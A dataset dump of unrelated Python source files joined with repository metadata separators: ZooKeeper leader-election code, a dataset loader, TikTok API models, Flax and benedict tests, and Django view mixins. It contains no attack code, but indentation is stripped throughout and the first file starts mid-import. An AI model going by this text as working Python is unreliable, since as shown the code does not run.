from kazoo.recipe.lock import LockTimeout
from ochopod.core.fsm import shutdown, spin_lock, Aborted, FSM
from pykka import ThreadingFuture, Timeout
from threading import Event
#: Our ochopod logger
logger = logging.getLogger('ochopod')
#: Root zookeeper node path (under which we store the pod data for each cluster). This path will prefix any node
#: we read or write (including the lock).
ROOT = '/ochopod/clusters'
#: We use the same tick for all our state-machines (namely one second). This quantity can be scaled up or
#: down depending on the actor
SAMPLING = 1.0
class ZK(FSM):
"""
Base layer dealing with zookeeper and in charge of writing the pod ephemeral node upon connection. The
reset() state will by default loop back to initial() and properly de-allocate the kazoo driver. Once connected
the machine will spin() until we raise something.
Please note we support an explicit reset request which will trip the machine. This is used from the CLI to
force a pod to completely disconnect/reconnect/reconfigure.
"""
def __init__(self, brokers, scope, tag, breadcrumbs, hints):
super(ZK, self).__init__()
self.breadcrumbs = breadcrumbs
self.connected = 0
self.brokers = brokers
self.force_reset = 0
self.hints = hints
self.hints['state'] = 'follower'
self.id = uuid.uuid4()
self.prefix = '%s/%s.%s' % (ROOT, scope, tag)
self.scope = scope
self.seq = None
self.tag = tag
def feedback(self, state):
#
# - forward the state change to the actor via a message
# - the specialized() hook will process this safely
#
self.actor_ref.tell(
{
'request': 'state change',
'state': state
})
def reset(self, data):
self.connected = 0
self.force_reset = 0
self.hints['state'] = 'follower'
logger.warning('%s : actor reset (%s)' % (self.path, data.cause))
if hasattr(data, 'zk'):
#
# - gracefully shut our client down
#
data.zk.stop()
logger.debug('%s : zk client stopped, releasing resources' % self.path)
data.zk.close()
if self.terminate:
super(ZK, self).reset(data)
return 'initial', data, 0
def initial(self, data):
#
# - setup a new kazoo client
#
cnx_string = ','.join(self.brokers)
logger.debug('%s : connecting @ %s' % (self.path, cnx_string))
data.zk = KazooClient(hosts=cnx_string, timeout=5.0, read_only=0, randomize_hosts=1)
data.zk.add_listener(self.feedback)
data.zk.start()
data.n = 0
return 'wait_for_cnx', data, 0
def wait_for_cnx(self, data):
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - loop back if we haven't received a CONNECTED event from the driver
#
if not self.connected:
return 'wait_for_cnx', data, SAMPLING
#
# - the /pods node holds all our ephemeral per-container data (one container == one child node)
# - the /hash node stores the last recorded md5 hash (local pods + dependencies), which we use to
# flag any change amongst the pods or their dependencies
#
data.zk.ensure_path('%s/pods' % self.prefix)
data.zk.ensure_path('%s/hash' % self.prefix)
try:
#
# - register ourselves by creating an ephemeral
# - this is where we can store arbitrary information (e.g our breadcrumbs)
# - we ask for a sequence counter as well which we then keep (e.g in case of connection loss or reset
# we guarantee the pod won't get assigned a new index)
# - this is *critical* for some use-cases (e.g Kafka where the broker index must remain the same)
#
path = data.zk.create('%s/pods/%s.' % (self.prefix, self.id), ephemeral=True, sequence=True)
tokens = path.split('.')
if self.seq is None:
self.seq = int(tokens[-1])
self.breadcrumbs['seq'] = self.seq
js = json.dumps(self.breadcrumbs)
data.zk.set(path, js)
except NodeExistsError:
#
# - if the node is already there we just recovered from a zookeeper connection loss
# and /snapshot has not been phased out yet .. this is not an issue, simply pause a bit
# to re-attempt later
#
logger.debug('%s : pod %s is already there (probably a zk reconnect)' % (self.path, self.id))
return 'wait_for_cnx', data, 5.0 * SAMPLING
logger.debug('%s : registered as %s (#%d)' % (self.path, self.id, self.seq))
data.connected_at = time.time()
return 'spin', data, 0
def spin(self, data):
raise NotImplementedError
def specialized(self, msg):
assert 'request' in msg, 'bogus message received ?'
req = msg['request']
if req == 'state change':
#
# - we got a zk state change
# - we only use the switch to CONNECTED to go from wait_for_cnx() to spin()
# - ZK disconnects (LOST or SUSPENDED) are simply flagged when exceptions are raised
#
state = msg['state']
current = 'connected' if self.connected else 'disconnected'
logger.debug('%s : zk state change -> "%s" (%s)' % (self.path, str(state), current))
if self.connected and state != KazooState.CONNECTED:
logger.warning('%s : lost connection (%s) / forcing a reset' % (self.path, str(state)))
self.force_reset = 1
self.connected = 0
elif state == KazooState.CONNECTED:
self.connected = 1
elif req == 'reset':
#
# - we got a request to explicitly force a reset
# - this is typically invoked from the CLI
#
self.force_reset = 1
else:
super(ZK, self).specialized(msg)
class Coordinator(ZK):
"""
Leader lock implementation logic, based on :class:`ZK`. The spin() state will attempt to grab a lock (we
simply use the Kazoo recipe). If we obtain the lock we boot the controller actor (e.g the clustering model)
and then stay there by spin-locking on its latch. If the controller goes down for any reason (typically a
zookeeper error or a shutdown request) we'll reset (and disconnect from zookeeper).
"""
def __init__(self, brokers, scope, tag, port, breadcrumbs, model, hints):
super(Coordinator, self).__init__(brokers, scope, tag, breadcrumbs, hints)
self.model = model
self.path = 'coordinator'
self.port = port
def reset(self, data):
if hasattr(data, 'controller'):
#
# - don't forget to nuke our controller before resetting
#
shutdown(data.controller)
if hasattr(data, 'lock'):
#
# - make sure to remove the lock attribute
# - it's useless to release the lock as we'll release the client altogether
#
delattr(data, 'lock')
return super(Coordinator, self).reset(data)
def spin(self, data):
#
# - if the termination trigger is set, abort immediately
#
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - attempt to fetch the lock
# - allocate it if not already done
# - it is *important* to just allocate one lock as there is a leak in kazoo
#
if not hasattr(data, 'lock'):
data.lock = data.zk.Lock('%s/coordinator' % self.prefix)
try:
#
# - attempt to lock within a 5 seconds timeout to avoid stalling in some cases
#
if data.lock.acquire(timeout=5.0 * SAMPLING):
return 'start_controller', data, 0
except LockTimeout:
pass
return 'spin', data, 0
def start_controller(self, data):
#
# - if the termination trigger is set, abort immediately
# - this is important as it is possible to somehow get the lock after a suspend (acquire() returns
# true in that case which is misleading)
#
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - we have the lock (e.g we are the leader)
# - start the controller actor
#
data.latch = ThreadingFuture()
logger.debug('%s : lock acquired @ %s, now leading' % (self.path, self.prefix))
data.controller = self.model.start(data.zk, self.id, self.hints, self.scope, self.tag, self.port, data.latch)
return 'lock', data, 0
def lock(self, data):
#
# - if the termination trigger is set, abort immediately
#
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - spin-lock on the controller latch
# - any catastrophic plug failure will be trapped that way
#
try:
Event()
out = data.latch.get(SAMPLING)
if isinstance(out, Exception):
raise out
except Timeout:
pass
return 'lock', data, 0 |
observations/r/bmt.py | hajime9652/observations | 199 | 12749367 | <filename>observations/r/bmt.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def bmt(path):
"""data from Section 1.3
The `bmt` data frame has 137 rows and 22 columns.
This data frame contains the following columns:
group
Disease Group 1-ALL, 2-AML Low Risk, 3-AML High Risk
t1
Time To Death Or On Study Time
t2
Disease Free Survival Time (Time To Relapse, Death Or End Of Study)
d1
Death Indicator 1-Dead 0-Alive
d2
Relapse Indicator 1-Relapsed, 0-Disease Free
d3
Disease Free Survival Indicator 1-Dead Or Relapsed, 0-Alive Disease
Free)
ta
Time To Acute Graft-Versus-Host Disease
da
Acute GVHD Indicator 1-Developed Acute GVHD 0-Never Developed Acute
GVHD)
tc
Time To Chronic Graft-Versus-Host Disease
dc
Chronic GVHD Indicator 1-Developed Chronic GVHD 0-Never Developed
Chronic GVHD
tp
Time To Chronic Graft-Versus-Host Disease
dp
Platelet Recovery Indicator 1-Platelets Returned To Normal,
0-Platelets Never Returned to Normal
z1
Patient Age In Years
z2
Donor Age In Years
z3
Patient Sex: 1-Male, 0-Female
z4
Donor Sex: 1-Male, 0-Female
z5
Patient CMV Status: 1-CMV Positive, 0-CMV Negative
z6
Donor CMV Status: 1-CMV Positive, 0-CMV Negative
z7
Waiting Time to Transplant In Days
z8
FAB: 1-FAB Grade 4 Or 5 and AML, 0-Otherwise
z9
Hospital: 1-The Ohio State University, 2-Alferd , 3-St. Vincent,
4-Hahnemann
z10
MTX Used as a Graft-Versus-Host- Prophylactic: 1-Yes 0-No
Klein and Moeschberger (1997) *Survival Analysis Techniques for Censored
and truncated data*, Springer.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `bmt.csv`.
Returns:
Tuple of np.ndarray `x_train` with 137 rows and 22 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'bmt.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/KMsurv/bmt.csv'
maybe_download_and_extract(path, url,
save_file_name='bmt.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
|
tiktok_bot/models/post.py | reliefs/tiktok_bot | 118 | 12749384 | <filename>tiktok_bot/models/post.py
from typing import List, Optional
from pydantic import BaseModel
from .music import MusicTrack
from .request import (
BaseResponseData,
CursorOffsetRequestParams,
CursorOffsetResponseParams,
ListRequestParams,
ListResponseData,
)
from .user import CommonUserDetails
from .video import Video
class PostStatistics(BaseModel):
# The ID of the post
aweme_id: str
# The number of comments on the post
comment_count: int
# The number of times the post has been liked
digg_count: int
# The number of times the post has been forwarded (looks unused?)
forward_count: Optional[int]
# The number of times the post has been viewed - doesn't appear to be public, so always 0
play_count: int
# The number of times the post has been shared
share_count: int
class PostStatus(BaseModel):
# True if the post allows comments
allow_comment: bool
# True if the post allows sharing
allow_share: bool
# 0 if the post can be downloaded
download_status: int
# True if the post is currently being reviewed
in_reviewing: Optional[bool]
# True if the post has been deleted
is_delete: bool
# True if the post is private
is_private: bool
# True if the post contains content that is not allowed on the platform
is_prohibited: Optional[bool]
# 0 if the post is public
private_status: Optional[int]
# 1 if the post has been reviewed
reviewed: Optional[int]
class PostTags(BaseModel):
# 0 if the tag is for a user; 1 if the tag is for a hashtag
type: int
# The name of the hashtag
hashtag_name: Optional[str]
# The ID of the tagged user
user_id: Optional[str]
class RiskInfo(BaseModel):
# The text shown if the post has been flagged
content: str
# ???
risk_sink: bool = False
# The risk type associated with the post - 0 if no risk; 1 if low; 2 if high
type: int
# ??? - only present if the post has been flagged
vote: Optional[bool]
# True if a warning should be shown to the user
warn: bool
class ShareInfo(BaseModel):
# ???
bool_persist: Optional[int]
# The description used when sharing (if set)
share_desc: str
# The description used when sharing a link only (if set)
share_link_desc: Optional[str]
# The quote used when sharing (if set)
share_quote: Optional[str]
# The signature used when sharing (if set)
share_signature_desc: Optional[str]
# The signature URL used when sharing (if set)
share_signature_url: Optional[str]
# The title used when sharing
share_title: str
# The link to share
share_url: str
# The description used when sharing on Weibo
share_weibo_desc: str
class StickerInfo(BaseModel):
# The ID of the sticker, e.g. 22094
id: str
# The display name of the sticker, e.g. Long Face
name: str
class Post(BaseModel):
# Details about the author
author: Optional[CommonUserDetails]
# The ID of the author
author_user_id: str
# The ID of the post
aweme_id: str
# The type of post - 0 for a musical.ly
aweme_type: int
# The timestamp in seconds when the post was created
create_time: int
# A description of the post
desc: str
# Details about the music used in the post
music: Optional[MusicTrack]
# True if the end user should not be provided the option to download the video
prevent_download: Optional[bool]
# An age rating for the post, e.g. 12
rate: int
# The 2-letter region the post was created in, e.g. US
region: str
# Risk information about the post
risk_infos: Optional[RiskInfo]
# Information used when sharing the post
share_info: Optional[ShareInfo]
# A link to the video on the musical.ly website that is used when sharing
share_url: str
# Statistics about the post
statistics: PostStatistics
# Status information about the post
status: PostStatus
# Information about the sticker used in the post
sticker_detail: Optional[StickerInfo]
# The ID of the sticker used in the post (looks to be deprecated by sticker_detail)
stickers: Optional[str]
# Tagged users and hashtags used in the description
text_extra: List[PostTags]
# 1 if the logged in user has liked this post
user_digged: int
# Details about the video in the post
video: Video
@property
def video_url(self):
url = filter(lambda url: "watermark" in url, self.video.download_addr.url_list)
return next(url)
@property
def video_url_without_watermark(self):
return self.video_url.replace("watermark=1", "watermark=0")
class GetPostResponse(BaseResponseData):
aweme_detail: Post
class ListPostsRequest(ListRequestParams, CursorOffsetRequestParams):
# The id of the user whose posts to retrieve
user_id: str
class ListPostsResponse(ListResponseData, CursorOffsetResponseParams):
aweme_list: List[Post]
|
preprocessing/TRStemmer/states/__init__.py | ucekmez/summarizer | 205 | 12749387 | from ..transitions import Transition
from ..suffixes import *
__all__ = ["State"]
class State(object):
def __init__(self, initialState, finalState, *suffixes):
self.initialState = initialState
self.finalState = finalState
if suffixes is None:
self.suffixes = ()
else:
self.suffixes = suffixes
def AddTransitions(self, word, transitions, marked):
for suffix in self.suffixes:
if suffix.Match(word):
transitions.append(Transition(self, self.NextState(suffix), word, suffix, marked))
def NextState(self, suffix):
raise NotImplementedError("Feature is not implemented.") |
examples/pixelcnn/model_test.py | navjotts/flax | 2,249 | 12749392 | <gh_stars>1000+
# Copyright 2021 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for PixelCNN Modules."""
import pixelcnn
from flax import linen as nn
from absl.testing import absltest
from absl.testing import parameterized
import numpy.testing as np_testing
from jax import random
import jax.numpy as np
from jax.config import config
class ModelTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.rng = random.PRNGKey(0)
self.x = np.arange(24).reshape(1, 4, 3, 2)
def get_weightnorm(self, params):
return [params[k] for k in ('direction', 'scale', 'bias')]
def assert_mean_and_variance(self, out):
# Weightnorm should ensure that, at initialization time, the outputs of the
# module have mean 0 and variance 1 over the non-feature dimensions.
np_testing.assert_allclose(np.mean(out, (0, 1, 2)), 0., atol=1e-5)
np_testing.assert_allclose(np.var(out, (0, 1, 2)), 1., atol=1e-5)
def test_conv(self):
model = pixelcnn.ConvWeightNorm(features=4, kernel_size=(3, 2))
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 2, 2, 4))
self.assert_mean_and_variance(out)
def test_conv_down(self):
model = pixelcnn.ConvDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_down_right(self):
model = pixelcnn.ConvDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose(self):
model = pixelcnn.ConvTranspose(features=4, kernel_size = (3, 2))
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 6, 4, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose_down(self):
model = pixelcnn.ConvTransposeDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']["ConvWeightNorm_0"]["weightnorm_params"]
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_conv_transpose_down_right(self):
model = pixelcnn.ConvTransposeDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_pcnn_shape(self):
x = random.normal(self.rng, (2, 4, 4, 3))
model = pixelcnn.PixelCNNPP(depth=0, features=2, dropout_p=0)
out, _ = model.init_with_output(self.rng, x, train=False)
self.assertEqual(out.shape, (2, 4, 4, 100))
if __name__ == '__main__':
absltest.main()
|
mcbv/edit_custom.py | akulakov/django | 150 | 12749429 | from copy import copy
from django.forms import formsets
from django.contrib import messages
from django.db.models import Q
from django.forms.formsets import formset_factory, BaseFormSet, all_valid
from detail import *
from edit import *
class SearchFormViewMixin(BaseFormView):
ignore_get_keys = ("page", ) # TODO this should be ignored in search form?
def get_form_kwargs(self):
"""Returns the keyword arguments for instantiating the form."""
req = self.request
kwargs = dict(initial=self.get_initial())
if req.method in ("POST", "PUT"):
kwargs.update(dict(data=req.POST, files=req.FILES))
elif req.GET:
# do get form processing if there's get data that's not in ignore list
get = dict((k,v) for k,v in req.GET.items() if k not in self.ignore_get_keys)
if get:
kwargs = dict(kwargs, initial=get, data=get)
return kwargs
def form_get(self, request):
form = self.get_form()
context = self.get_context_data(form=form)
if self.request.GET:
if form.is_valid() : context.update(self.form_valid(form))
else : context.update(self.form_invalid(form))
return context
class SearchFormView(FormView, SearchFormViewMixin):
"""FormView for search pages."""
class OwnObjMixin(SingleObjectMixin):
"""Access object, checking that it belongs to current user."""
item_name = None # used in permissions error message
owner_field = "creator" # object's field to compare to current user to check permission
def permission_error(self):
name = self.item_name or self.object.__class__.__name__
return HttpResponse("You don't have permissions to access this %s." % name)
def validate(self, obj):
if getattr(obj, self.owner_field) == self.request.user:
return True
def get_object(self, queryset=None):
obj = super(OwnObjMixin, self).get_object(queryset)
return obj if self.validate(obj) else None
class DeleteOwnObjView(OwnObjMixin, DeleteView):
"""Delete object, checking that it belongs to current user."""
class UpdateOwnObjView(OwnObjMixin, UpdateView):
"""Update object, checking that it belongs to current user."""
class UpdateRelatedView(DetailView, UpdateView):
"""Update object related to detail object; create if does not exist."""
detail_model = None
form_model = None
fk_attr = None
related_name = None
def get_modelform_object(self, queryset=None):
""" Get related object: detail_model.<related_name>
If does not exist, create: form_model.<fk_attr>
"""
obj = self.get_detail_object()
kwargs = {self.fk_attr: obj}
try:
related_obj = getattr(obj, self.related_name)
except self.form_model.DoesNotExist:
related_obj = self.form_model.obj.create(**kwargs)
setattr(obj, self.related_name, related_obj)
return related_obj
class SearchEditFormset(SearchFormView):
"""Search form filtering a formset of items to be updated."""
model = None
formset_class = None
form_class = None
def get_form_class(self):
if self.request.method == "GET": return self.form_class
else: return self.formset_class
def get_queryset(self, form=None):
return self.model.objects.filter(self.get_query(form))
def get_query(self, form):
"""This method should always be overridden, applying search from the `form`."""
return Q()
def form_valid(self, form):
formset = None
if self.request.method == "GET":
formset = self.formset_class(queryset=self.get_queryset(form))
else:
form.save()
messages.success(self.request, "%s(s) were updated successfully" % self.model.__name__.capitalize())
formset = form
form = self.form_class(self.request.GET)
return self.render_to_response(self.get_context_data(form=form, formset=formset))
def form_invalid(self, form):
formset = form
form = self.form_class(self.request.GET)
return self.render_to_response(self.get_context_data(form=form, formset=formset))
def get(self, request, *args, **kwargs):
form = self.get_form()
if form.is_bound:
if form.is_valid(): return self.form_valid(form)
else: return self.form_invalid(form)
return self.render_to_response(self.get_context_data(form=form))
|
tests/dicts/parse/test_parse_util.py | next-franciscoalgaba/python-benedict | 365 | 12749433 | <reponame>next-franciscoalgaba/python-benedict<gh_stars>100-1000
# -*- coding: utf-8 -*-
from benedict.dicts.parse import parse_util
import unittest
class parse_util_test_case(unittest.TestCase):
def test_parse_bool(self):
f = parse_util.parse_bool
self.assertTrue(f(1))
self.assertTrue(f(True))
self.assertTrue(f('1'))
self.assertTrue(f('True'))
self.assertTrue(f('Yes'))
self.assertTrue(f('Ok'))
self.assertTrue(f('On'))
self.assertFalse(f(None))
self.assertFalse(f(0))
self.assertFalse(f(False))
self.assertFalse(f('0'))
self.assertFalse(f('False'))
self.assertFalse(f('No'))
self.assertFalse(f('Ko'))
self.assertFalse(f('Off'))
def test_parse_date(self):
# TODO
pass
def test_parse_datetime(self):
# TODO
pass
def test_parse_decimal(self):
# TODO
pass
def test_parse_dict(self):
# TODO
pass
def test_parse_float(self):
# TODO
pass
def test_parse_email(self):
# TODO
pass
def test_parse_int(self):
# TODO
pass
def test_parse_list(self):
f = lambda value: parse_util.parse_list(value, separator=',')
self.assertEqual(f(['0', '1', '2', 'Hello World']), ['0', '1', '2', 'Hello World'])
self.assertEqual(f('0,1,2'), ['0', '1', '2'])
self.assertEqual(f('0'), ['0'])
self.assertEqual(f('1'), ['1'])
self.assertEqual(f(''), None)
self.assertEqual(f(None), None)
def test_parse_list_with_valid_json(self):
f = lambda value: parse_util.parse_list(value, separator=None)
self.assertEqual(f('[0,1,2,3]'), [0, 1, 2, 3])
def test_parse_list_with_invalid_json_with_separator(self):
f = lambda value: parse_util.parse_list(value, separator=',')
self.assertEqual(f('[a,b,c]'), ['[a', 'b', 'c]'])
def test_parse_list_with_invalid_json_without_separator(self):
f = lambda value: parse_util.parse_list(value, separator=None)
self.assertEqual(f('[a,b,c]'), None)
def test_parse_phonenumber(self):
# TODO
pass
def test_parse_slug(self):
# TODO
pass
def test_parse_str(self):
# TODO
pass
def test_parse_uuid(self):
# TODO
pass
|
TradzQAI/core/__init__.py | kkuette/AI_project | 164 | 12749446 | from .environnement import Local_env
from .environnement import Live_env
from .worker import Local_Worker
from .worker import Live_Worker
from .session import Local_session
from .session import Live_session
|
custom_components/local_luftdaten/__init__.py | Aulos/local_luftdaten | 163 | 12749452 | """
Support for local Luftdaten sensors.
Copyright (c) 2019 <NAME>
Licensed under MIT. All rights reserved.
https://github.com/lichtteil/local_luftdaten/
"""
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.